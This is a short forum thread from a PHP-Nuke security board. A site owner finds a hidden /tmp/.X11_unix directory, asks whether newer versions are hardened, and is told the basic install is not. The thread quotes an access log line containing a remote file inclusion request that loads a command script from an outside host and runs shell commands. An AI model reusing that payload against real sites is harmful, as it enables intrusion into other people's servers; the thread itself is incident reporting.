>>
Site Map
>>
Forums
>>
PHP-Nuke Security
Forum module - topics in forum:
PHP-Nuke Security - Been hacked? or have a question about securing your site, here's the place.
X11_unix irc chat room
Hi
during a recent check i came across /tmp/.X11_unix
all owened by apache so i did a grep of the access logs and found this <extract only many lines>
/home/domain/domain110/logs/access_log:200.32.121.22 - - [03/Sep/2005:08:44:34 0100] "GET /phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt/jmascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
Obviously a way in.
I have killed the phpnuke install & removed the installed X11_unix code
no other users have phpnuke installed. is latest version hardened to this?
KramTechie
Not the basic install of Nuke no... which is why we constantly badger people to install protection.
